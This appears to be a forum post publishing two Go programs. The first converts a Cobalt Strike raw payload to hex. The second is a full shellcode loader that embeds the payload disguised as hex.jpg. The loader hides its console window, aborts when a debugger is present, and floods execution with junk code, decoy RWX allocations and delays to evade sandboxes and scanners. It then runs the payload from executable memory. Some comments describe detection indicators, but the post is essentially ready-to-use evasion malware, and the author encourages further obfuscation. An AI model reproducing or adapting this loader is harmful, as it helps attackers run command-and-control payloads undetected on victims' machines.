Generate a bin file in ram format through Cobalt Strike and convert it into hexadecimal shellcode through
123.go code:
Code:
Rename the generated shellcode.txt to hex.jpg so that the Go loader can package it as an embedded resource file (the contents are still hex text; only the extension changes)
Code:
Now you can happily do more obfuscation and loading
I just want to publish these codes
123.go code:
Code:
Code:
package main
import (
"encoding/hex"
"flag"
"fmt"
"io/ioutil"
)
// main hex-encodes the file named by the -f flag and writes the resulting
// text to shellcode.txt in the current directory. The help text mentions a
// 32-bit EXE, but nothing here inspects the input format: every byte of the
// file is encoded as two lowercase hex characters. Failures are reported on
// stdout, and the process still exits with status 0.
func main() {
	src := flag.String("f", "", "Specify the path to the 32-bit EXE file")
	flag.Parse()

	// Without a path there is nothing to convert.
	if len(*src) == 0 {
		fmt.Println("Please specify the path to the 32-bit EXE file with the -f flag")
		return
	}

	raw, readErr := ioutil.ReadFile(*src)
	if readErr != nil {
		fmt.Printf("Failed to read file: %v\n", readErr)
		return
	}

	// Two hex characters per input byte.
	encoded := make([]byte, hex.EncodedLen(len(raw)))
	hex.Encode(encoded, raw)

	if writeErr := ioutil.WriteFile("shellcode.txt", encoded, 0644); writeErr != nil {
		fmt.Printf("Failed to write file: %v\n", writeErr)
		return
	}
	fmt.Println("Conversion successful, output written to shellcode.txt")
}
Rename the generated shellcode.txt to hex.jpg so that the Go loader can package it as an embedded resource file (the contents are still hex text; only the extension changes)
Code:
Code:
package main
import (
"encoding/hex"
"math/rand"
"syscall"
"time"
"unsafe"
_ "embed"
"github.com/lxn/win"
)
// Win32 memory-management flag values passed to VirtualAlloc by
// allocateFakeMemory and executeShellcode. PAGE_EXECUTE_READWRITE asks for
// pages that are writable and executable at the same time.
// Analyst note: private, non-image-backed RWX regions are a standard
// memory-scanning indicator for in-memory payload loading.
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
// hexData receives the bytes of hex.jpg at build time through the go:embed
// directive below. main hands these bytes to hex.DecodeString, so the file is
// treated as hex text regardless of its .jpg extension (MITRE ATT&CK
// T1027.009, Embedded Payloads). Analyst note: an embedded resource named
// *.jpg that holds ASCII hex instead of image data is a triage signal.
//go:embed hex.jpg
var hexData []byte
// Handles to kernel32.dll / msvcrt.dll exports, resolved when the package's
// variables are initialised. MustLoadDLL and MustFindProc panic if the DLL or
// export cannot be found, so a missing export stops the program before main.
// Analyst note: the export names are ordinary string literals in this source.
var (
k32 = syscall.MustLoadDLL("kernel32.dll")
VAlloc = k32.MustFindProc("VirtualAlloc")
VFree = k32.MustFindProc("VirtualFree")
memcpy = syscall.MustLoadDLL("msvcrt.dll").MustFindProc("memcpy")
isDebuggerPresent = k32.MustFindProc("IsDebuggerPresent")
checkRemoteDebugger = k32.MustFindProc("CheckRemoteDebuggerPresent")
)
// antiDebugCheck aborts the process with a panic when either of two Win32
// debugger queries reports a debugger, then runs strongObfuscation
// (MITRE ATT&CK T1622, Debugger Evasion).
// Analyst note: the panic messages below are fixed strings, and calls to
// IsDebuggerPresent / CheckRemoteDebuggerPresent right after process start
// are visible in API-call telemetry.
func antiDebugCheck() {
// First check: IsDebuggerPresent takes no arguments; non-zero means attached.
ret, _, _ := isDebuggerPresent.Call()
if ret != 0 {
panic("Debugger detected, exiting...")
}
// Second check: CheckRemoteDebuggerPresent is called with 0xffffffff as the
// process-handle argument and a pointer to the result variable. The call's
// own return value and error are discarded; only the out-parameter is read.
var debuggerPresent int32
_, _, _ = checkRemoteDebugger.Call(0xffffffff, uintptr(unsafe.Pointer(&debuggerPresent)))
if debuggerPresent != 0 {
panic("Remote debugger detected, exiting...")
}
strongObfuscation()
}
// allocateFakeMemory performs `times` decoy allocations that have no bearing
// on the payload: each one requests a random-sized RWX region, scribbles
// random bytes into it, and calls VirtualFree on it.
// It calls strongObfuscation after every iteration, and strongObfuscation can
// call back into this function, so the two are mutually recursive.
// Analyst note: this produces bursts of small VirtualAlloc calls with
// PAGE_EXECUTE_READWRITE protection, which stand out in API-call telemetry.
func allocateFakeMemory(times int) {
for i := 0; i < times; i++ {
// Region size is 1024..5119 bytes.
size := uintptr(rand.Intn(4096) + 1024)
addr, _, _ := VAlloc.Call(0, size, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr != 0 {
// Touch one byte in every 64 with a random value.
for j := 0; j < int(size); j += 64 {
*(*byte)(unsafe.Pointer(addr + uintptr(j))) = byte(rand.Intn(256))
}
// VirtualFree is called with size 0 and free type 0; its result is not checked.
VFree.Call(addr, 0, 0)
}
strongObfuscation()
}
}
// addRandomDelays stalls execution: it sleeps in random slices of 0..999 ms
// until the accumulated sleep time reaches maxDelay, running the junk
// routines between slices (MITRE ATT&CK T1497.003, Time Based Evasion).
// Only the sleeps issued here count towards maxDelay; the routines it calls
// sleep as well, so the wall-clock time spent is longer than maxDelay.
func addRandomDelays(maxDelay time.Duration) {
// Re-seeds the shared math/rand source from the current time on every call.
rand.Seed(time.Now().UnixNano())
totalDelay := time.Duration(0)
for totalDelay < maxDelay {
delay := time.Duration(rand.Intn(1000)) * time.Millisecond
time.Sleep(delay)
totalDelay += delay
// Filler work with no effect on program state beyond time and CPU use.
randomCalculations()
fakeFunctionChain()
fakeAPICalls()
strongObfuscation()
}
}
// fakeFunctionChain picks one of the three busy-loop functions at random
// (by a random number modulo 3) and then runs strongObfuscation. It has no
// output; its only effect is to vary the call sequence between runs.
func fakeFunctionChain() {
a := rand.Intn(1000)
if a%3 == 0 {
fakeFuncA()
} else if a%3 == 1 {
fakeFuncB()
} else {
fakeFuncC()
}
strongObfuscation()
}
// fakeFuncA is filler: 5000 iterations that compute and discard i*i, each
// followed by a call to strongObfuscation. It produces no result.
func fakeFuncA() {
for i := 0; i < 5000; i++ {
_ = i * i
strongObfuscation()
}
}
// fakeFuncB is filler: 3000 iterations that compute and discard i+i, each
// followed by a call to strongObfuscation. It produces no result.
func fakeFuncB() {
for i := 0; i < 3000; i++ {
_ = i + i
strongObfuscation()
}
}
// fakeFuncC is filler: 7000 iterations that compute and discard i-i, each
// followed by a call to strongObfuscation. It produces no result.
func fakeFuncC() {
for i := 0; i < 7000; i++ {
_ = i - i
strongObfuscation()
}
}
// randomCalculations is filler arithmetic: 20000 iterations of multiply,
// divide, XOR and shift on random operands, with every result discarded and
// a strongObfuscation call per iteration.
func randomCalculations() {
for i := 0; i < 20000; i++ {
a := rand.Intn(100)
b := rand.Intn(100)
// rand.Intn(1) always yields 0, so the divisor here is always 1.
c := (a * b) / (1 + rand.Intn(1))
_ = (c ^ rand.Intn(1000)) << 2
strongObfuscation()
}
}
// fakeAPICalls sleeps for a random 0..499 ms, reads the clock and the process
// ID, discards both values, and runs strongObfuscation. Nothing it reads is
// used anywhere else.
func fakeAPICalls() {
time.Sleep(time.Duration(rand.Intn(500)) * time.Millisecond)
_ = time.Now().UnixNano()
_ = syscall.Getpid()
strongObfuscation()
}
// executeShellcode copies sc into a freshly allocated RWX region of the
// current process and transfers control to the start of that region.
// The sequence is VirtualAlloc(RWX) -> memcpy -> delay -> indirect call.
// Analyst note: execution from private memory that is not backed by an image
// on disk, allocated as PAGE_EXECUTE_READWRITE, is the behaviour that memory
// scanners and EDR call-stack checks are built to flag.
func executeShellcode(sc []byte) {
addr, _, _ := VAlloc.Call(0, uintptr(len(sc)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
// Allocation failed; return without reporting anything.
return
}
// msvcrt's memcpy moves the payload bytes into the executable region.
memcpy.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
// Roughly ten seconds of sleeps and filler work between the copy and the call.
addRandomDelays(10 * time.Second)
// Calls the region's base address as a function with no arguments.
syscall.Syscall(addr, 0, 0, 0, 0)
// Reached only if the called code returns. VirtualFree is called with size 0
// and free type 0; its result is not checked.
VFree.Call(addr, 0, 0)
strongObfuscation()
}
// confuseControlFlow runs a random sequence of the filler routines. The loop
// bound rand.Intn(5)+5 is re-evaluated on every iteration, so the number of
// rounds varies between runs. Each round ends with strongObfuscation.
func confuseControlFlow() {
for i := 0; i < rand.Intn(5)+5; i++ {
switch rand.Intn(4) {
case 0:
fakeFunctionChain()
case 1:
// rand.Intn(2) is 0 or 1, so the delay budget is zero or one second.
addRandomDelays(time.Duration(rand.Intn(2)) * time.Second)
case 2:
randomCalculations()
case 3:
allocateFakeMemory(rand.Intn(5) + 1)
}
strongObfuscation()
}
}
// strongObfuscation is the filler routine that every other function in this
// file calls. Each iteration does a discarded XOR and a 0..9 microsecond
// sleep, then with probability 1/2 calls allocateFakeMemory and with
// probability 1/5 calls fakeFunctionChain. Both of those call
// strongObfuscation again, so the call graph is recursive.
// The loop bound rand.Intn(1000) is re-rolled on every iteration.
func strongObfuscation() {
for i := 0; i < rand.Intn(1000); i++ {
_ = rand.Intn(1000) ^ rand.Intn(1000)
time.Sleep(time.Duration(rand.Intn(10)) * time.Microsecond)
if rand.Intn(2) == 0 {
// rand.Intn(3) may be 0, in which case no decoy allocation happens.
allocateFakeMemory(rand.Intn(3))
}
if rand.Intn(5) == 0 {
fakeFunctionChain()
}
}
}
// main is the loader entry point. In order, it hides the console window,
// runs the debugger checks, runs filler code, hex-decodes the embedded
// hex.jpg bytes, runs more filler and delays, and passes the decoded bytes to
// executeShellcode.
// Analyst note: the observable sequence is a console window hidden at start
// (MITRE ATT&CK T1564.003, Hidden Window), debugger queries, a long idle/busy
// phase, then an RWX allocation of payload size followed by an indirect call.
func main() {
win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
antiDebugCheck()
confuseControlFlow()
// The decode error is discarded, so sc is passed on even if decoding failed.
sc, _ := hex.DecodeString(string(hexData))
allocateFakeMemory(10)
addRandomDelays(5 * time.Second)
executeShellcode(sc)
confuseControlFlow()
strongObfuscation()
}
Now you can happily do more obfuscation and loading
I just want to publish these codes